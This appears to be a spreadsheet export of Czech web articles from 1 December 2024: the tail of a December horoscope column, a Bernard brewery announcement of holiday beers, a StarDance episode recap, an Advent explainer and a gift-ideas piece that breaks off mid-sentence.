budete pozváni. Mění se vaše okolí. My si připomeneme, že je to tím, že od května 2024 do června 2025 se Jupiter nachází ve znamení Blíženců. Lvi zjišťují, jak je důležité, s kým se stýkají a do jakých skupin patří. Lvi se naučili, že veškeré životní situace jsou vyvolávány díky lidem, kteří je obklopují. Proto je super vyhnout se problémovým jedincům. Lvi, snažte se dostat mezi důležité lidi. Lidé, kteří mají známosti, vám přihrají novou životní nabídku nebo vám dají zajímavý tip. Vy díky tomu povýšíte nebo se dostanete tam, kam potřebujete. V životním období, ve kterém se nacházíte, z vás vyzařuje větší sexappeal. Jste přitažlivější a sexuální energie z vás tryská. Je možné, že zažijete zážitek, na který nikdy nezapomenete. Kdo má partnera, tomu doporučuji obohatit spíše sexuální život s člověkem, kterého má vedle sebe. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. To znamená zprávy, vyřizování, úřady, doklady, ale také reklama. Možná dostanete nový mobil, chytré hodinky nebo počítač. Dávejte si pozor na své okolí. Že by někdo sliboval něco, co nedodrží? Nebo se někdo chová falešně? Nebo se už s někým nechcete stýkat? Nepřetvařujte se. Dne 21. 12. 2024 začíná zima. Lvi, v prosinci si užijte Vánoce a buďte šťastní s rodinou. Na konci roku oslavujte, ale opatrně. Hlídejte si zdravíčko. Dne 30. 12. 2024 proběhne novoluní ve znamení Kozoroha, ale to se promítne do života spíše příští rok. Že by se řešilo něco na pracovišti? Nebo vás čeká nová spolupráce? Noví kolegové? Lvi, nechte se překvapit. Přečtete si vše v mé další knize HOROSKOPY NA ROK 2025. Panna A máme tady prosinec. Poslední měsíc v roce. Začne to napínavě: dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. To má na starosti cesty, stěhování, přesuny, pohyb a péči o končetiny. Panny prošly životní proměnou a prosinec jim splní přání, které se týká jejich bydlení. Ve znamení Střelce se nachází také Merkur. Je čas komunikovat o způsobu bydlení, ale také o rodinných vztazích. Jak to udělat, aby se doma všichni cítili v pohodě? Panny, naplánujte si letos Vánoce ve velkém. Sejděte se celá rodina. Nejde o to, kolik budete mít dárků, jde o atmosféru a rodinné setkání, protože rodina je nejvíc. Panny, které řeší problém s nějakou ženou, by ho měly urovnat. Je na čase zharmonizovat všechny vztahy. Merkur je ve znamení Střelce. Panny mohou komunikovat s někým, kdo je hodně daleko. Komunikace může probíhat také přes mobil a internet. Pozornost byste měly věnovat svým končetinám a trávení. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Jupiter dělá konjunkci s Lunou, a to slibuje silný emoční zážitek. Panny, jste spokojené v práci? V pracovním kolektivu? Se svým šéfem? Připomeneme si, že ve znamení Blíženců se Jupiter nachází již od května 2024 a bude tam do června 2025. Pannám toto postavení přinese posun v jejich kariéře. Dostanou novou příležitost. Některé si najdou novou práci, jiné povýší a některé dokonce začnou podnikat. Všechny Panny dostanou šanci, aby zvedly svou prestiž a podtrhly svou důležitost. Jde o to, aby si jich okolí více všímalo, aby je více uznávalo. Panny se potřebují cítit důležitě, proto ten rozvoj jejich osobnosti. Dne 21. 12. 2024 proběhne zimní slunovrat. Nastává zima. Dobrá zpráva je, že se začnou prodlužovat dny a zkracovat noci. V prosinci proběhne ještě jedno novoluní. Dne 30. 12. 2024 proběhne novoluní ve znamení Kozoroha. A to znamená, že konec roku 2024 bude pro Panny společensky velmi rušný. Vliv tohoto novoluní se více promítne v příštím roce. Panny, krásné Vánoce a hodně štěstí v novém roce. Já se na vás těším u mé další knihy HOROSKOPY NA ROK 2025. Váhy A máme tady prosinec, poslední měsíc v roce. Začne to napínavě. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. To má na starosti cesty, stěhování, přesuny, pohyb a péči o končetiny. Venuše se nachází v Kozorohu a Váhy budou připravovat svůj domov na Vánoce. Atmosféru prosince mají Váhy rády, hlavně ty, které si nemyslí, že se musejí strhat uklízením. Naopak: prosinec by měl být pro Váhy časem, ve kterém se setkají s rodinou. Něco oslaví a hodně si budou povídat. Váhy potřebují vnímat, že je kolem nich rodina nebo přátelé, o které se člověk může opřít. Protože Váhy nesnášejí samotu. Některé z nich budou řešit auto. Radím vám opatrnost na cestách. Váhy budou muset někam chodit nebo jezdit, stále budou něco vyřizovat. Váhy, a zase ty papíry a úřady, že? Prosinec je vhodné období na to, aby Váhy sdělily všem, co chtějí a jak to chtějí. Je na čase udělat si reklamu, napsat dopisy, rozeslat SMS a podat žádosti. Některé Váhy mohou dostat důležitou zprávu. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Jupiter dělá konjunkci s Lunou. My si připomeneme, že Jupiter se v Blížencích nachází od května 2024 a bude tam do června 2025. Jupiter dává Vahám možnosti, kterých by měly využít. Vzdělávat se, pohybovat se mezi vzdělanými lidmi. Najít si svůj koníček. Kdo chce, měl by cestovat. Řešit lidi, kteří žijí v zahraničí. Kdo nechce cestovat, může pracovat pro zahraniční firmu nebo v oblasti vzdělávání. Váhy jsou více napojené na svůj vnitřní svět a objevují obrovské rozměry své bohaté duše. Cítí tu proměnu, která se v nich odehrává. Váhy vědí, že je to proto, aby se jim mohly otevřít nové obzory. Dne 21. 12. 2024 začíná zima. Dobrá zpráva je, že se od tohoto dne začnou krátit noci a prodlužovat dny. V prosinci proběhne ještě jedno novoluní, a to dne 30. 12. 2024. To bude zaměřeno na zkvalitnění vztahů v rodině, na způsob bydlení, na aktivity doma. Vliv tohoto novoluní se naplno projeví až v příštím roce. Váhy, oslavte Vánoce, krásně si vydekorujte byt, buďte okouzlující a usmívejte se. Okolí přitáhnete úsměvem, nikoliv špatnou náladou. Hodně štěstí a já se těším, že se setkáme u mé další knihy HOROSKOPY NA ROK 2025. Štír A máme tady prosinec, poslední měsíc v roce. Začne to napínavě. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. To má na starosti cesty, stěhování, přesuny, pohyb a péči o končetiny. Pluto dělá opozici na Mars ve Lvu, což se může promítnout do pracovní roviny. Štíři se budou zamýšlet, jak jsou na tom pracovně. Budou toužit po pracovišti, kde by si jich ostatní vážili, kde by docenili jejich odbornost a kde by Štíři za svou práci dostali odměnu. Štíři, baví vás vaše práce? Je to zázrak, když má někdo práci, která je zároveň jeho koníček. Kdo chce práci změnit nebo zažádat o novou, může. Je vhodné také chtít větší příjem. Ale Štíři, pozor! Někdo vám chce přidat práci, ale nezvednout mzdu. Nenecháte si to líbit, že? Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Jupiter dělá konjunkci s Lunou. Jupiter je v Blížencích od května 2024 a bude tam do června 2025. A právě tento úplněk v Blížencích zvýrazní téma, které vyvolává Jupiter u lidí narozených ve znamení Štíra. Štíři budou pracovat na své ekonomice. Na majetkových poměrech. Mohou něco zdědit, vyhrát, získat, koupit, investovat. Jen ten, kdo nemá zpracovaný správný přístup k financím, ztratí. Všichni ostatní získají. Štíři mají až do června v příštím roce prostor vyřešit si majetek, který sdílejí s někým jiným. Upravit smlouvy i pojištění – své, a také svého majetku. Vyřešit všechny papíry. Jednat s bankami, vytvořit si účty, které jsou výhodné. Jupiter působí také na sexuální život Štírů. Někteří Štíři budou skloňovat téma věrnost a nevěra. Jiní budou toužit po vzrušujících zážitcích. Někteří se setkají s člověkem, který je bude přitahovat. A další Štíři budou snít svůj sen o vzrušující a zároveň romantické lásce. Dne 21. 12. 2024 začíná zima. Za pár dní jsou Vánoce. Štíři, soustřeďte se na rodinu a na rodinné svátky. Vánoce jsou svátky klidu, míru, harmonie. Najdete pod stromečkem překvapení? Anebo někoho překvapíte vy? Čeká vás ještě jedno novoluní, a to dne 30. 12. 2024 v Kozorohu. Štíři, dávejte si pozor, s kým a o čem mluvíte. Silvestr oslavte řádně, ale pod vlivem alkoholu nic neřešte, neslibujte. Když budete někomu psát, hlídejte si, ať to odešlete správně. Příští rok zbohatnete. Těšíte se? Hodně štěstí! Více se dozvíte v mé knize HOROSKOPY NA ROK 2025. Střelec Je tady prosinec. Na tento měsíc Střelci určitě nezapomenou. Slunce se nachází ve znamení Střelce, a tak těmto lidem dodává energii. V prosinci čeká Střelce nejdůležitější novoluní v roce. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. To má na starosti cesty, stěhování, přesuny, pohyb a péči o končetiny. Pluto dělá opozici na Mars ve Lvu, což se může promítnout do osudové změny. Změny osobnosti. Změny myšlení. Nový osudový krok. Ve znamení Střelce se nachází Merkur. Je čas na nové začátky. Je čas na nová rozhodnutí. Je čas jít do akce a ukázat světu prstem na schopného, jedinečného a originálního člověka. Na sebe. Merkur pomůže Střelcům vše vyřídit, napsat. Střelci by si měli udělat reklamu, protože nyní je vesmírné oko zaměřeno na jejich osobu. Po celý rok 2024 Střelci pracovali na posílení tématu, které se týká jejich domova, rodiny, vztahů se ženami a vztahů ke svému krásnému tělu. Toto téma bude pokračovat v roce 2025. Je velmi důležité, aby měli Střelci doma pohodu, aby bydleli podle svých představ, aby prožívali krásné rodinné vztahy. A na tom mají pracovat. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Luna udělá konjunkci s Jupiterem. Bude to velmi citlivé období. A intuice Střelcům napoví, jak se mají zachovat. Jupiter je v Blížencích od května 2024 a bude tam do června 2025. Právě tento úplněk v Blížencích zvýrazní téma, které vyvolává Jupiter u lidí narozených ve znamení Střelce. Toto téma je zaměřeno na pracovní a také osobní vztahy. Během tohoto tranzitu mohou Střelci podepisovat nové smlouvy. Někteří začnou spolupracovat s novou firmou. Jiní budou řešit pracovního společníka. Jak v pracovních, tak v partnerských vztazích budou Střelci pracovat na tom, aby si vylepšili životní podmínky. A protože jim vesmír přeje, jednání pro ně dopadnou dobře. Dne 21. 12. 2024 začíná zima. Za pár dní jsou Vánoce. Střelci, soustřeďte se na rodinu a na rodinné svátky. Vánoce jsou svátky klidu, míru, harmonie. Střelci, čeká vás ještě jedno novoluní, a to dne 30. 12. 2024 v Kozorohu. Hodně štěstí! Více se dozvíte v mé knize HOROSKOPY NA ROK 2025. Kozoroh Je tady prosinec, poslední měsíc v roce. Dne 21. 12. 2024 začíná zima. Dny se konečně začnou prodlužovat. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. To má na starosti cesty, stěhování, přesuny, pohyb a péči o končetiny. Pečovat o pohybový aparát, o páteř, o kosti, to je pro Kozorohy celoživotní úkol. A jestliže berou dlouhodobě vitamíny a minerály, zlepší se také stav jejich chrupu a kvalita vlasů. Kozorohové, kteří mají složitější život, by se o svůj chrup měli starat velmi pečlivě. Problémy v životě se mohou projevit právě na stavu zubů. Prosinec je náročný měsíc. Kozorohové budou přemýšlet, co mají v životě změnit. Cítí, že to už takhle dál nejde. Prosinec je měsíc, ve kterém mají spíše přemýšlet a plánovat. Důležitá rozhodnutí by si měli nechat buď na konec měsíce, anebo to nechat až na leden. Někteří Kozorohové poznají, že jim někdo nepřeje. Může to být pomluva nebo nějaký naschvál. Tohle je ale stav, který by Kozorohové neměli moc prožívat. Spíše si dát pozor, ať mají vše v pořádku na úřadech. Kozorohové objeví nějaké tajemství. Nebo že by se něco provalilo? Pluto dělá opozici na Mars ve Lvu, což se může promítnout do osudové změny. Na začátku měsíce se ještě bude Venuše pohybovat znamením Kozoroha. Stále je čas na využití vašeho osobního kouzla. Kozorohové, připravujte Vánoce, kupujte dárky, ať připravíte sobě a své rodině krásné svátky. Prosinec je náročný, je proto potřeba si hlídat nejen zdraví fyzické, ale také psychické. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Luna udělá konjunkci s Jupiterem. Bude to velmi citlivé období. A intuice Kozorohům napoví, jak se mají zachovat. Čekají je silné, emočně vypjaté situace. Jupiter je v Blížencích od května 2024 a bude tam do června 2025. A právě tento úplněk v Blížencích zvýrazní téma, které vyvolává Jupiter u lidí narozených ve znamení Kozoroha. Kozorohové mají změnit svůj životní styl a více pečovat o své zdraví. Jupiter na ně působí také v pracovní oblasti. Může přijít změna kolem spolupracovníků. Je tak důležité, s kým člověk spolupracuje – zda je to okolí schopné; okolí, ve kterém panují vztahy na úrovni. Pracovně k sobě Kozorohové potřebují lidi pracovité, lidi, kteří dodržují pořádek, systém; na které se člověk může spolehnout. Dařit se bude Kozorohům ve službách, anebo těm, kteří pracují s klientelou či pro občany. Dne 21. 12. 2024 začíná zima. Slunce vstupuje do znamení Kozoroha. Nabije tyto jedince energií. Za pár dní jsou Vánoce. Kozorohové, soustřeďte se na rodinu a na rodinné svátky. Vánoce jsou svátky klidu, míru, harmonie. Kozorohové, čeká vás další novoluní ve vašem vlastním znamení. Tento rok prožíváte, milí Kozorohové, vaše druhé novoluní. Prožili jste i dva úplňky. Rok 2024 byl pro vás bohatý na události. A milí Kozorohové, někteří z vás nyní stojí na nové startovací čáře. Přicházejí nové šance, je potřeba se posunout. A vy to zvládnete. Dne 30. 12. 2024 proběhne novoluní v Kozorohu. Oslavte Silvestra, hned v lednu si vyhrnete rukávy a budete makat. Hodně štěstí! Více se dozvíte v mé knize HOROSKOPY NA ROK 2025. Vodnář Je tady prosinec, poslední měsíc v roce. Dne 21. 12. 2024 začíná zima, dny se konečně budou prodlužovat. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. To má na starosti cesty, stěhování, přesuny, pohyb a péči o končetiny. Je potřeba pečovat o pohybový aparát, hlavně o kolena a klouby. Vodnáři si své končetiny musejí hlídat, a to hlavně když sportují. Prosinec bude o lásce a společenských setkáváních. Vodnáři by měli jít všude, kam budou pozváni. Mohou potkat mnoho zajímavých lidí. Mohou potkat někoho, kdo je zaujme, ale také někoho, koho zaujmou oni. Některá osudová setkání proběhnou, a člověk v ten moment ani neví, že to je ono. Až čas ukáže, o jak důležitý okamžik šlo. Proto všem Vodnářům radím neustále se usmívat, s každým vycházet dobře, nebavit se o nikom, kdo není přítomen a být v komunikaci diplomatický. Pluto dělá opozici na Mars ve Lvu. To může znamenat změnu pravidel. Co se domluvilo? Platí to? Některé věci člověk v záchvatu radosti slíbí, ale potom je všechno jinak. Vodnáři, pamatujte si, že vše, o čem nyní hovoříte, co podepisujete nebo co slibujete, výrazně ovlivní váš osud. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Luna udělá konjunkci s Jupiterem. Je čas posílit vztahy s parterem, a kdo má děti, měl by posílit i vztahy s nimi. A to se hodí, protože je prosinec, tedy Vánoce. Vodnáři, věnujte se rodině a važte si lásky. Važte si lidí, kteří vás mají rádi. Není to samozřejmost. Udělejte si krásné Vánoce a vymyslete opět něco vtipného. S vámi se nikdy nikdo nenudí, proto jste ve společnosti tak oblíbení. Jupiter je v Blížencích od května 2024 a bude tam do června 2025. Připomeneme si, co to znamená pro Vodnáře. To je velmi inteligentní postavení. Vodnáři ucítí, že by se měli učit nové věci. Potřebují se vzdělávat, a to proto, aby mohli více zaujmout své okolí. Je to úžasné, když může člověk ukázat, jak je sečtělý, zcestovalý, jaký má přehled. Vodnáři to milují, protože rádi oslňují okolí v různých diskuzích. Středem pozornosti se často stávají na akcích, jsou vtipní a umí se přizpůsobit každé společnosti. Proto mívají hodně známých. A jsou přitažliví pro opačné pohlaví. Některým Vodnářům se začnou zapalovat lýtka. Protože roky 2024 a 2025 budou vhodné pro lásku. Někoho čeká láska nová a jiný si upevní partnerství stávající. Vodnáři budou své partnerské vztahy řešit. Potřebují ve vztahu stále prožívat něco nového, potřebují akčního partnera. Někteří Vodnáři se rozhodnou upevnit svůj svazek nebo zplodit dítě. A kdo už děti má, tak vytvoří nový životní projekt. Dne 30. 12. 2024 proběhne novoluní v Kozorohu. Budete přemýšlet o změnách. Jste opět v situaci, ve které se necítíte tak, jak byste si představovali? Nechte to až na leden. Venuše je ve vašem znamení, tak využijte svého osobního kouzla. Záříte. Vynikáte. Jste ten nejkrásnější Aquarius na světě. Oslavte Silvestra, hned v lednu si vyhrnete rukávy a budete makat. Hodně štěstí! Více se dozvíte v mé knize HOROSKOPY NA ROK 2025. Ryby Dne 21. 12. 2024 začíná zima, dny se konečně budou prodlužovat. Je tady prosinec, ve kterém Rybičky dostanou šanci více se prosadit. A tato šance bude pokračovat i v příštím roce. Dne 1. 12. 2024 proběhne novoluní ve znamení Střelce. To má na starosti cesty, stěhování, přesuny, pohyb a péči o končetiny. Rybičky, buďte opatrné na své nožičky! Hlídejte si ledviny, a pozor, ať neprochladnete. Hodně spěte. Dejte se do pohody vnitřně. Potřebujete silnou psychickou odolnost. Přihlaste se o svá práva. O novou práci. O povýšení. Chtějte větší odměnu. Kdyby vás někdo v práci prudil, buďte nad věcí. Nehádejte se s nadřízeným, to nevyhrajete. Použijte svůj osobní šarm. Během roku 2024 jste hodně pokročily v tématu, jak být více diplomatickým jedincem. Dne 15. 12. 2024 proběhne úplněk ve znamení Blíženců. Luna udělá konjunkci s Jupiterem. Letos v květnu se Jupiter přesunul do znamení Blíženců a Ryby začaly tvořit nový příběh. O rodině, o bydlení, o sobě a o svých představách. Vše, co se týká tématu bydlení a představy o tom, jak by chtěl člověk žít, se začne postupně naplňovat. Rybám, které chtěly pracovat z domova, se to povede. Některé Ryby budou mít k dispozici nové prostory. Novou kancelář. Ryby vědí, že je velice důležité, aby měly stabilitu v oblasti bydlení. Kdo bydlí podle svých představ, je spokojený a cítí se doma v bezpečí, je potom úspěšný i v jiných životních oblastech. Rodina je také důležitá. Ryby již podnikly v minulosti hodně kroků k tomu, aby zlepšily své rodinné vztahy. Rodina je nejvíc, a když funguje, je to fajn. Pro některé Ryby jsou rodina jejich přátelé, pro některé dokonce kolektiv v práci. Ryby prožívají období, ve kterém si budou muset dát do pořádku vztahy se ženami. Se ženami v rodině, se ženami v práci, se ženami, které nějak ovlivňují jejich život. A protože Ryby touží být ještě krásnější, než jsou, spousta těchto jedinců zaměřila nebo zaměří pozornost na zkrášlování těla. Dne 24. 12. 2024 je Štědrý den. Rybičky, Vánoce prožijte krásně s rodinou, u pohádek. Nepřejídejte se, protože pracujete na svém krásném těle. Ale dopřejte si, pokud můžete. Ryby, jíte ryby? Jestli ano, dejte si kapříka, ale soustřeďte se na jídlo a dávejte pozor na kostičky. Prožijte svátky v kruhu rodinném, dejte si dárky a jděte do přírody nebo do kostela. Poděkujte za to, co máte, a poproste o to, po čem toužíte. V prosinci prožijeme ještě jedno novoluní. Proběhne dne 30. 12. 2024 a bude v Kozorohu. Toto novoluní ovlivní začátek příštího roku. Ryby čeká společensky plodný prosinec. Měly by zorganizovat nějakou akci nebo prostě jít všude, kde se něco bude dít. Některé Ryby budou mít štěstí. Čeká je zajímavé setkání. Jiných Ryb si někdo všimne, bude je dál pozorovat a v budoucnu jim pomůže. Ryby, které vědí, co chtějí, a jdou za tím, dostanou zajímavou odměnu. Ryby, jestli máte kvalitní přátele, tak si jich važte. Víte, jak to dneska chodí, že? Každý sleduje jen své zájmy. A spolehnout se můžete pouze na pár jedinců. Oslavte Silvestra, hned v lednu si vyhrnete rukávy a budete makat. Hodně štěstí! Více se dozvíte v mé knize HOROSKOPY NA ROK 2025. Pro časopis a portál Ve hvězdách napsala astroložka a spisovatelka Martina Blažena Boháčová Časopis Ve hvězdách si lze předplatit prostřednictvím linky předplatného + 420 777 157 435, e-mail: info@astrolife.cz (roční předplatné 300 Kč, na 2 roky 600 Kč), pro Slovensko na telefonním čísle tel: +421 800 188 826 nebo na e-mailu: e-mail: objednavky@ipredplatne.sk Autor: Roman Zahrádka Autor person Roman Zahrádka</t>
  </si>
  <si>
    <t>1060</t>
  </si>
  <si>
    <t>744000</t>
  </si>
  <si>
    <t>20241201_188_3475756389_e9199d4ae2a0bedbef87.html</t>
  </si>
  <si>
    <t>e9199d4ae2a0bedbef87</t>
  </si>
  <si>
    <t>Bernard uvařil na svátky dva pivní speciály</t>
  </si>
  <si>
    <t>Bernard uvařil na svátky dva pivní speciály Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Dne 1. 12. 2024 Ekonomika , Pelhřimovsko , Zprávy 148 Zobrazení Rodinný pivovar Bernard připravil na letošní svátky dvě unikátní piva – polotmavý Adventní speciál a limitovanou edici Ležáku s chmelem z Vysočiny. Vánoce ve sklenici Prvním ze speciálů je Adventní speciál Bernard, polotmavý ležák, který je se svojí podmanivou vůní a chutí ideální volbou v předvánočním čase v útulných hospodách a restauracích. „Polotmavou třináctku s hustou pěnou jsme uvařili z výběru kvalitních sladů – českého, bavorského, karamelového a čokoládového,“ popisuje Josef Vávra, vrchní sládek a generální ředitel pivovaru. Adventní speciál má příjemnou vůni s tóny karamelu a sladu, harmonickou chuť a vyváženou hořkost, kterou zajišťuje kombinace několika druhů chmele. Obsah alkoholu činí 5,6 %, hořkost dosahuje 32 jednotek hořkosti (IBU). K dostání je výhradně čepovaný v hospodách a restauracích. Ležák s chmelem z Vysočiny Ležák s chmelem z Vysočiny: chmelová jedinečnost Koření pro druhou sváteční novinku, Ležák s chmelem z Vysočiny, narostlo na loni založené chmelnici v nadmořské výšce 560 metrů. Na svahu za městem pivovar poprvé vypěstoval a sklidil úrodu ze 144 rostlin šesti odrůd chmele. „Chmel z naší chmelnice je plnohodnotný, aromatický a pivo z něj lidem chutná. Navazuje tak na tradici, kdy jsem chmel do speciálu pěstoval několik let jen doma na zahradě,“ říká Josef Vávra. Ležák s chmelem z Vysočiny je svěží jedenáctka s obsahem alkoholu 4,7 % a hořkostí 38 IBU. Adventní speciál Speciály ve vybraných prodejnách a restauracích Oba speciály jsou limitovanou záležitostí, k ochutnání budou od prvního adventního týdne v podnicích s čepovaným pivem Bernard, Ležák s chmelem z Vysočiny bude dostupný i v lahvích ve značkových prodejnách pivovaru. Autor: Radek Tulis Autor person Radek Tulis Rubrika transition_slide Ekonomika</t>
  </si>
  <si>
    <t>484</t>
  </si>
  <si>
    <t>352</t>
  </si>
  <si>
    <t>20241201_189_3475741297_3acdff8a84413b6a0965.html</t>
  </si>
  <si>
    <t>3acdff8a84413b6a0965</t>
  </si>
  <si>
    <t>Ze StarDance vypadla Vondráčková, Hes měl potlesk vestoje</t>
  </si>
  <si>
    <t>Ze StarDance vypadla Vondráčková , Hes měl potlesk vestoje Atmosféra ve StarDance byla nabitá emocemi, ale také přišlo loučení. Diváci domů poslali Lucii Vondráčkovou . Zůstávají už pouze čtyři soutěžní páry Je za námi další díl třinácté řady StarDance, která se do finále blíží mnohem rychleji, než bychom si přáli. Po minulém benefičním večeru pro Centrum Paraple, kdy panovala uvolněná atmosféra a nevypadl žádný ze soutěžních párů, nás tentokrát opustila Lucie Vondráčková s tanečním partnerem Lukášem Bartuňkem . Lucka s Lukášem od poroty schytali negativní kritiku za nedostatek kroků při slowfoxu, i když hravá a veselá show s deštníky jistě potěšila mnohé diváky. Ti se nad hodnocením přísných porotců rozčilují na sociálních sítích a vnímají velkou nespravedlnost. Pokud prý takto hodnotí Vondráčkovou , měli by stejným metrem měřit i Martině Ptáčkové . Jenže show nestačí. A možná to byla právě nevhodně vybraná hudba s nedostatkem tanečních kroků, která se jim stala osudným. Za jejich druhý tanec si naopak vyslechli slova chvály, byli obodováni třemi desítkami, ale pro postup do dalšího kola to nestačilo. Je pravda, že v této fázi už v soutěži nenajdeme taneční pár s většími nedostatky. Před první adventní nedělí na taneční parket nastoupilo pět tanečních párů, které odtancovaly rovnou dva tance. V první části jsme si užívali quickstep, cha-chu a slowfox. Jako druhý tanec jsme obdivovali scénické tance, které se setkaly s velmi pozitivním ohlasem. Negativní kritiky od poroty bylo jako šafránu. Nechci rozebírat jednotlivá taneční vystoupení, ale ráda bych vyzdvihla emotivní tanec Oskara Hese . Ten kluk má vážně neskutečný talent! Za celou dobu, co v televizi běží StarDance, mě žádný tanec nechytl za srdíčko tak moc, jako tento. Oskar Hes : dechberoucí tanec, slzy a potlesk vestoje Oskar Hes si vysloužil velkou chválu za scénický tanec na téma závislost . Nevím, jestli to byl Oskarův záměr, ale asi nejen já jsem si okamžitě vzpomněla na jeho tátu, který bojoval se závislostí na alkoholu . Celý už tak silný zážitek z vystoupení velmi umocnil výběr songu Kříž od českého zpěváka Davida Stypky , který už mezi námi bohužel není. Začátkem příštího roku to budou už čtyři roky, co odešel po vážné nemoci ve 41 letech. Jak řekl Jan Tománek, Oskar Hes na tanečním parketu zastínil i profesionální tanečníky a za své vystoupení si právem vysloužil tři desítky. Pokud by porota mohla, dala by prý víc. Po emotivním vystoupení Oskara Hese se tleskalo vestoje a Tatiana Drexler byla tak dojatá, že nezvládla skrývat slzy. A já se jí vůbec nedivím. Tento tanec se vryl i pod moji kůži, a to jsem ho viděla jen na televizní obrazovce. Zážitek naživo musí být o mnoho silnější. Oskar Hes tančí jako profík a díl od dílu mě překvapuje víc a víc. Už teď se těším na to, co nás čeká příští sobotu.</t>
  </si>
  <si>
    <t>20241201_19_3495177019_557fc04a49a38ae10317.html</t>
  </si>
  <si>
    <t>557fc04a49a38ae10317</t>
  </si>
  <si>
    <t>První adventní neděle. Odkud pochází tradice zapalování svíček?</t>
  </si>
  <si>
    <t>První adventní neděle. Odkud pochází tradice zapalování svíček? Sdílet na WhatsApp Advent, období plné klidu, očekávání a příprav na Vánoce, začíná čtyři týdny před Štědrým dnem. Slovo „advent“ pochází z latinského adventus, což znamená „příchod“. Toto období je tradičně spojováno s očekáváním narození Ježíše Krista a jeho příchodu na svět. Kromě duchovního rozměru je advent i časem rodinných tradic, zimních radostí a rozjímání nad uplynulým rokem. Dnes, v první adventní neděli, vstupujeme do významného času. Adventní věnec se čtyřmi svíčkami, symbolem naděje, víry, radosti a míru, je jedním z hlavních symbolů adventu. Na dnešní den připadá zapálení první svíčky, která symbolizuje naději. Tento rituál je pro mnohé rodiny chvílí, kdy se společně sejdou, ztiší a vzpomínají na pravý smysl Vánoc. Advent má své kořeny ve 4. století, kdy se začal slavit jako přípravné období před Vánocemi. Původně byl spojen s postem a modlitbami, podobně jako období před Velikonocemi. Lidé se připravovali na oslavu narození Krista duchovním očištěním a zaměřením na pomoc druhým. I dnes je advent v křesťanských tradicích časem zamyšlení, dobročinnosti a sdílení lásky s bližními. Moderní pojetí adventu přináší další zvyklosti, které tento čas obohacují. Jednou z oblíbených tradic je adventní kalendář, který dětem i dospělým pomáhá odpočítávat dny do Vánoc. Na trzích voní svařené víno , pečivo a cukroví, a mnozí lidé věnují víkendy pečení perníčků a přípravě na sváteční dny. První adventní neděle nám připomíná, že Vánoce jsou na dosah. Je to příležitost zpomalit, nadechnout se a strávit čas se svými blízkými. V dnešním uspěchaném světě může být advent chvílí, kdy se vrátíme k jednoduchým radostem života – společnému zpívání koled, večerům u svíček nebo laskavým gestům vůči těm, kteří potřebují naši pomoc. Adventní čas nás učí nejen očekávat něco krásného, ale také být vděční za to, co už máme. A právě dnes, kdy zapalujeme první svíčku na věnci, máme možnost na chvíli se zastavit a rozjímat o naději, kterou tento čas přináší. Autor: Libor Frýdl Autor person Libor Frýdl</t>
  </si>
  <si>
    <t>27040</t>
  </si>
  <si>
    <t>3600</t>
  </si>
  <si>
    <t>20241201_190_3475710348_8b98af32d5292db98d2c.html</t>
  </si>
  <si>
    <t>8b98af32d5292db98d2c</t>
  </si>
  <si>
    <t>Jaké dárky pořídit blízkým pod stromeček? Máme pro vás pár finančně nenáročných tipů a některé vás nebudou stát ani korunu</t>
  </si>
  <si>
    <t>Jaké dárky pořídit blízkým pod stromeček? Máme pro vás pár finančně nenáročných tipů a některé vás nebudou stát ani korunu 5 min. 1. 12. 2024 Rok se s rokem sešel a už je zase na čase vymýšlet dárky pro naše blízké. Vánoce však nejsou o obrovských darech a utracení velkých finančních částek, ze kterých se chce plakat nejen našim peněženkám, ale je krásné udělat v tomto období radost blízké osobě i nějakou drobností. Abyste si nemuseli lámat hlavu s čím asi tak potěšit mámu, bráchu nebo třeba dědu, v tomto článku najdete pár tipů, co pořídit pod stromeček. REKLAMA Čím potěšit mámy To nejtěžší hned na začátek. Asi to tak bude mít většina maminek. Vlastně nic nepotřebují, nechtějí, co si přejí si koupí samy, aby s nimi nikdo neměl starost. Když už se moje mamka vyjádří, co by si přála, většinou je to něco jako “klid a pohodu”, což bohužel pořídit jen tak někdo nedokáže. Mám tedy pár univerzálních tipů, jak i té Vaší mamince udělat pod stromečkem radost. Všechny mámy pracují na 120% a zaslouží si odpočinek a čas pro sebe, tudíž perfektním dárkem bude například masáž. Na pomoc od bolesti a uvolnění od stresu můžete pořídit akupresurní podložku. Pro maminky čtenářky můžete nakoupit knihy od jejich oblíbených spisovatelů či pořídit skladnou čtečku, kterou si mohou vzít všude s sebou. Každou maminku jistě potěšíte i oblíbeným parfémem. A čím rozhodně nikdy nic nezkazíte je poukázka, a to například na nákup kosmetiky, doplňků či oblečení, aby si udělala radost podle sebe. Potěšit může například i hrneček či teplá deka. Dárek pro tátu Tátové jsou opět složitější, co se týče pořizování dárků. Stejně tak jako maminky, většinu věcí si koupí sami. Tátovi ale můžete udělat radost třeba kvalitní peněženkou, k sehnání jsou i takové, na kterých může být něco vyryto dle vašeho přání. Dárky vás nemusí zruinovat, Ilustrační foto, Zdroj: Pixabay.com Pro taťky pivaře můžete pořídit půllitr, buď s vlastním rytím, vtipným potiskem či například se znakem oblíbeného sportovního klubu. Nejednoho tátu potěší výběr dobrot, které má rád – salámy, klobásy, sýry – prostě oblíbené chlapské pochoutky. Nenechte si ujít: Jestli je váš táta spíše na manuální práci než na pivo a jídlo, určitě neurazí sada kvalitního nářadí, kufřík na nářadí a pro ty, co rádi vaří například kufřík na grilování či kvalitní nože. Pro babičku Babičky jsou asi tak podobně náročné jako mámy a přejí si jen, aby byli všichni zdraví a šťastní. Jak ale udělat radost i babičce? Rozhodně potěší foto kalendáře vlastní výroby a koláže v rámečku. Babička může ocenit teplou deku či vyhřívací podložku, třeba do křesla k televizi. Radost můžete udělat hezkým 